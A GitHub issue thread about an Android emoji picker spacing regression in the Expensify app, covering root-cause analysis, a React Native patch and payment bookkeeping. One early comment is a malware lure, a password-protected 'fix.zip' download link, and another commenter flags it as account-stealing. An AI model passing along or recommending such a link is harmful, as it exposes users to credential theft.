### ISSUE TITLE
[HOLD for payment 2024-11-07] [$500] Android - Chat - Spacing below emoji picker when opening emoji picker while keyboard is up

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#48100]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** 9.0.25-3
**Reproducible in staging?:** Y
**Reproducible in production?:** N
**Email or phone of affected tester (no customers):** applausetester+kh05081@applause.expensifail.com
**Issue reported by:** Applause Internal Team

## Action Performed:
1. Launch New Expensify app.
2. Go to DM.
3. Dismiss the keyboard if keyboard is up.
4. Tap emoji picker.
5. Note that emoji picker is at the bottom of the screen (no spacing below the emoji picker).
6. Focus on the composer to bring up the keyboard.
7. Tap emoji picker while keyboard is up.

## Expected Result:
There will be no spacing below the emoji picker.

## Actual Result:
There is spacing below the emoji picker when opening emoji picker while keyboard is up.

## Workaround:
Unknown

## Platforms:

- [x] Android: Native
- [ ] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/b11ff3bf-31c0-4af7-bec2-e1a12fe50bb0

![Bug6584231_1724771172689!1000031622-2024-08-27_15_02_23 561 (1)](https://github.com/user-attachments/assets/a0d36152-9d49-4047-8dc7-f4279aa6fb2e)

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~01f2e4be2af4f4a7d5</li>
        <li>Upwork Job ID: 1828513910835097845</li>
        <li>Last Price Increase: 2024-10-16</li>
<li>Automatic offers: </li>
<ul>
<li>situchan | Reviewer | 104482969</li>
<li>QichenZhu | Contributor | 104482971</li>
</ul></li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @johncschuster</details>

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by jp928** [comment]
## Proposal

### Please re-state the problem that we are trying to solve in this issue.

Spacing below emoji picker when opening emoji picker while keyboard is up

### What is the root cause of that problem?
With the keyboard shows up, the function
https://github.com/Expensify/App/blob/3d8ee65e38db769eae56c9c7ee39f0597dff05ad/src/components/EmojiPicker/EmojiPicker.tsx#L93
will calculate the emoji popup with offset of keyboard. 

### What changes do you think we should make in order to solve the problem?

Add `Keyboard.dismiss()` to proactively dismiss the keyboard, and calculate the anchor position with delay.

```
Keyboard.dismiss();
        // It's possible that the anchor is inside an active modal (e.g., add emoji reaction in report context menu).
        // So, we need to get the anchor position first before closing the active modal which will also destroy the anchor.
        setTimeout(() => {
            calculateAnchorPosition(emojiPopoverAnchor?.current, anchorOriginValue).then((value) => {
                Modal.close(() => {
                    console.log('==================================>', value);
                    onWillShow?.();
                    setIsEmojiPickerVisible(true);
                    setEmojiPopoverAnchorPosition({
                        horizontal: value.horizontal,
                        vertical: value.vertical,
                    });
                    emojiAnchorDimension.current = {
                        width: value.width,
                        height: value.height,
                    };
                    setEmojiPopoverAnchorOrigin(anchorOriginValue);
                    setActiveID(id);
                });
            });
        }, 250);
```

### What alternative solutions did you explore? (Optional)
NA

**Comment by situchan** [comment]
@jp928 thanks for the proposal. I think the solution is workaround. We should fix the root cause.
This is recent regression (maybe from RN upgrade). There has been no issue without dismissing keyboard.

**Comment by jp928** [comment]
@situchan Thanks for reviewing, I just updated my proposal. Cheers.

**Comment by situchan** [comment]
@jp928 thanks. I agree that the root cause is related to status bar. But can't we fix it without making status bar non-translucent?
Emoji picker should be same as all other modals regarding status bar translucency.

**Comment by jp928** [comment]
@situchan Thank for reply. Would you like to find a workaround with package-patch or a PR to upstream react-native repo?

**Comment by situchan** [comment]
> PR to upstream react-native repo

Sounds good to me if it's RN bug really

**Comment by johncschuster** [comment]
@situchan is there an existing PR out there to fix this RN bug or are you just suggesting that that's where this needs to be fixed?

**Comment by situchan** [comment]
> is there an existing PR out there to fix this RN bug

No

> are you just suggesting that that's where this needs to be fixed?

yes if the root cause is in upstream

**Comment by situchan** [comment]
Not overdue

**Comment by stitesExpensify** [comment]
@situchan what is the current situation that makes this not overdue? Do we have a solution?

**Comment by situchan** [comment]
We're still waiting for proposals. Can someone from expert contributor group volunteer?

**Comment by johncschuster** [comment]
Looking for proposals in [Slack](https://expensify.slack.com/archives/C01GTK53T8Q/p1727214637714409)

**Comment by QichenZhu** [comment]
A similar upstream issue https://github.com/facebook/react-native/pull/29292 was [resolved](https://github.com/facebook/react-native/pull/29292) before, but the fix was recently [reverted](https://github.com/facebook/react-native/pull/45928) to address https://github.com/facebook/react-native/issues/45880.

**Comment by QichenZhu** [comment]
@fabOnReact Could you share some context when you have a chance? Since you are the author of the original fix.

**Comment by johncschuster** [comment]
Bumped @fabOnReact in Slack

**Comment by johncschuster** [comment]
Bumped in Slack, [here](https://expensify.slack.com/archives/C01GTK53T8Q/p1728074940844129?thread_ts=1727815184.630739&cid=C01GTK53T8Q)

**Comment by johncschuster** [comment]
Still looking for proposals

**Comment by QichenZhu** [comment]
## Proposal

### Please re-state the problem that we are trying to solve in this issue.

The emoji picker doesn’t position at the bottom of the screen if opened while the soft keyboard is up.

### What is the root cause of that problem?

A similar upstream issue https://github.com/facebook/react-native/issues/27526 was resolved in https://github.com/facebook/react-native/pull/29292 before.

<img width="1111" alt="Screenshot 2024-10-08 at 1 49 10 AM" src="https://github.com/user-attachments/assets/2166caf1-f7b5-4164-af2a-3d6879111fd0">

<p></p>

But the fix was recently reverted in https://github.com/facebook/react-native/pull/45928 to address https://github.com/facebook/react-native/issues/45880.

<img width="1101" alt="Screenshot 2024-10-08 at 1 32 34 AM" src="https://github.com/user-attachments/assets/9be75a99-519d-40b5-b79e-d50712cbdea2">

<p></p>

`mLastHeight` includes the translucent status bar height, while `mVisibleViewArea.height()` does not.

### What changes do you think we should make in order to solve the problem?

Patch `node_modules/react-native/ReactAndroid/src/main/java/com/facebook/react/ReactRootView.java` by replacing lines [894](https://github.com/facebook/react-native/blob/2e994fdddb05955ee8dcce1e2151288977dd1c5e/packages/react-native/ReactAndroid/src/main/java/com/facebook/react/ReactRootView.java#L894) and [943](https://github.com/facebook/react-native/blob/2e994fdddb05955ee8dcce1e2151288977dd1c5e/packages/react-native/ReactAndroid/src/main/java/com/facebook/react/ReactRootView.java#L943) with

```Java
// Use mLastHeight to account for the translucent status bar and
// fall back to mVisibleViewArea.height() if mLastHeight hasn't been measured yet.
PixelUtil.toDIPFromPixel(mWasMeasured ? mLastHeight : mVisibleViewArea.height()),
```

### What alternative solutions did you explore? (Optional)
N/A

**Comment by situchan** [comment]
@QichenZhu thanks for the proposal. Can we fix this in upstream?

**Comment by QichenZhu** [comment]
@situchan Yeah, we’d better fix this in upstream. But some issues like https://github.com/Expensify/App/issues/23889#issuecomment-1763452349 and https://github.com/Expensify/App/issues/27174#issuecomment-2288504376 can’t wait and end up with a patch. So, should we fix this in upstream, add a patch, or do both?

**Comment by situchan** [comment]
@stitesExpensify wdyt https://github.com/Expensify/App/issues/48100#issuecomment-2398852857?

**Comment by johncschuster** [comment]
@stitesExpensify bump! What are your thoughts on the question above?

**Comment by johncschuster** [comment]
@stitesExpensify bump! We've got an outstanding question [here](https://github.com/Expensify/App/issues/48100#issuecomment-2398852857).

**Comment by stitesExpensify** [comment]
> Yeah, we’d better fix this in upstream. But some issues like https://github.com/Expensify/App/issues/23889#issuecomment-1763452349 and https://github.com/Expensify/App/issues/27174#issuecomment-2288504376 can’t wait and end up with a patch. So, should we fix this in upstream, add a patch, or do both?

Apologies for the delay, let's do both. I will double the payout since it is more work

**Comment by situchan** [comment]
@QichenZhu I see that your another [upstream PR](https://github.com/facebook/react-native/pull/46948) was merged quickly. Similarly can you please create new issue and PR in upstream?
If it takes longer, we're sure to do patch first and remove it after RN upgrade.

**Comment by QichenZhu** [comment]
> I see that your another upstream PR was merged quickly. Similarly can you please create new issue and PR in upstream?

@situchan Yeah, I’d love to. But I’m working on another issue assigned to me at the moment. Could I be assigned to this one? I’ll schedule it for tomorrow or early next week.

**Comment by QichenZhu** [comment]
Aiming to raise an upstream issue today.

**Comment by QichenZhu** [comment]
I raised an upstream issue https://github.com/facebook/react-native/issues/47140.

The solution I suggested there is different from my proposed one here because it needs to work in Bridgeless mode as well, but since we've disabled that mode in our repo, we don't need to consider it.

https://github.com/Expensify/App/blob/e74eb8e705bce3e8791e3eb043fe5cbb1cbaecea/android/app/src/main/java/com/expensify/chat/MainApplication.kt#L62

**Comment by QichenZhu** [comment]
@situchan I expect the fix will take a while since it needs to cover many scenarios, but in our repo it’s easier because we don’t use those configurations. I suggest we go with a simple patch in our repo, and I'll keep an eye on the upstream issue in parallel. What do you think?

**Comment by situchan** [comment]
@QichenZhu sure. Feel free to raise patch PR

**Comment by QichenZhu** [comment]
Update: The upstream issue is still open and awaiting triage.

**Comment by johncschuster** [comment]
Thanks for the update!

**Comment by johncschuster** [comment]
I will issue payment tomorrow. @QichenZhu / @situchan I note the BZ Checklist was not automatically generated. Can you please complete BZ Checklist before I issue payment?

**Comment by johncschuster** [comment]
# BugZero Checklist:

- [ ] **@situchan** Classify the bug:

<details>
<summary>Bug classification</summary>


Source of bug:
  - [ ] 1a. Result of the original design (eg. a case wasn't considered)
  - [ ] 1b. Mistake during implementation
  - [ ] 1c. Backend bug
  - [ ] 1z. Other:

Where bug was reported:
  - [ ] 2a. Reported on production
  - [ ] 2b. Reported on staging (deploy blocker)
  - [ ] 2c. Reported on a PR
  - [ ] 2z. Other:

Who reported the bug:
  - [ ] 3a. Expensify user
  - [ ] 3b. Expensify employee
  - [ ] 3c. Contributor
  - [ ] 3d. QA
  - [ ] 3z. Other:

</details>

- [ ] **@situchan** The offending PR has been commented on, pointing out the bug it caused and why, so the author and reviewers can learn from the mistake.

    Link to comment:

- [ ] **@situchan** If the regression was CRITICAL (e.g. interrupts a core flow) A discussion in [#expensify-open-source](https://app.slack.com/client/E047TPA624F/C01GTK53T8Q) has been started about whether any other steps should be taken (e.g. updating the PR review checklist) in order to catch this type of bug sooner.

    Link to discussion:

- [ ] **@situchan** If it was decided to create a regression test for the bug, please propose the [regression test](https://github.com/Expensify/App/blob/main/contributingGuides/REGRESSION_TEST_BEST_PRACTICES.md) steps using the template below to ensure the same bug will not reach production again.

<details>
<summary>Regression Test Proposal Template</summary>


- [ ] **[BugZero Assignee]** Create a GH issue for creating/updating the regression test once above steps have been agreed upon.

    Link to issue:

## Regression Test Proposal
### Precondition:


-

### Test:


1.

Do we agree 👍 or 👎


</details>

**Comment by johncschuster** [comment]
I've issued payment to @QichenZhu.

@situchan, can you please complete the BZ Checklist above? Once complete, I'll issue payment 👍

**Comment by johncschuster** [comment]
Hey folks! It looks like @situchan is on parental leave (congrats! 🎉 ). Can anyone else step in and provide the BZ Checklist in his absence?

**Comment by johncschuster** [comment]
Given the duration of @situchan's leave, I've gone ahead and paid them out since I don't want to BZ Checklist to block us from paying this and closing it. @QichenZhu can you provide the BZ Checklist for this one?

**Comment by QichenZhu** [comment]
# BugZero Checklist:

- [x] **@QichenZhu** Classify the bug:

<details>
<summary>Bug classification</summary>


Source of bug:
  - [ ] 1a. Result of the original design (eg. a case wasn't considered)
  - [ ] 1b. Mistake during implementation
  - [ ] 1c. Backend bug
  - [x] 1z. Other: React Native introduced a change in version 0.75.2: https://github.com/facebook/react-native/commit/1cea8e8027755c2fd259f8b70478c4aa3267479e

Where bug was reported:
  - [ ] 2a. Reported on production
  - [x] 2b. Reported on staging (deploy blocker)
  - [ ] 2c. Reported on both staging and production
  - [ ] 2d. Reported on a PR
  - [ ] 2z. Other:

Who reported the bug:
  - [ ] 3a. Expensify user
  - [ ] 3b. Expensify employee
  - [ ] 3c. Contributor
  - [x] 3d. QA
  - [ ] 3z. Other:

</details>

- [x] **@QichenZhu** The offending PR has been commented on, pointing out the bug it caused and why, so the author and reviewers can learn from the mistake.

    Link to comment: https://github.com/facebook/react-native/issues/47140#issuecomment-2427287553

- [x] **@QichenZhu** If the regression was CRITICAL (e.g. interrupts a core flow) A discussion in [#expensify-open-source](https://app.slack.com/client/E047TPA624F/C01GTK53T8Q) has been started about whether any other steps should be taken (e.g. updating the PR review checklist) in order to catch this type of bug sooner.

    Link to discussion: N/A

- [x] **@QichenZhu** If it was decided to create a regression test for the bug, please propose the [regression test](https://github.com/Expensify/App/blob/main/contributingGuides/REGRESSION_TEST_BEST_PRACTICES.md) steps using the template below to ensure the same bug will not reach production again.

- [ ] **@johncschuster** Create a GH issue for creating/updating the regression test once above steps have been agreed upon.

    Link to issue:

## Regression Test Proposal
### Precondition:


-

### Test:


1. Launch the mobile web or native app. These steps don’t apply to non-mobile platforms.
2. Go to DM.
3. If the soft keyboard is open, dismiss it.
4. Tap the emoji button.
5. Note the emoji picker position (it should fully cover the composer), then dismiss it.
6. If the soft keyboard is closed, tap the composer to bring it up.
7. Tap the emoji button again.
8. Verify that the emoji picker is in the same position as in step 5. The test fails if it moves up and exposes part of the composer.

Do we agree 👍 or 👎

**Comment by johncschuster** [comment]
Thank you!
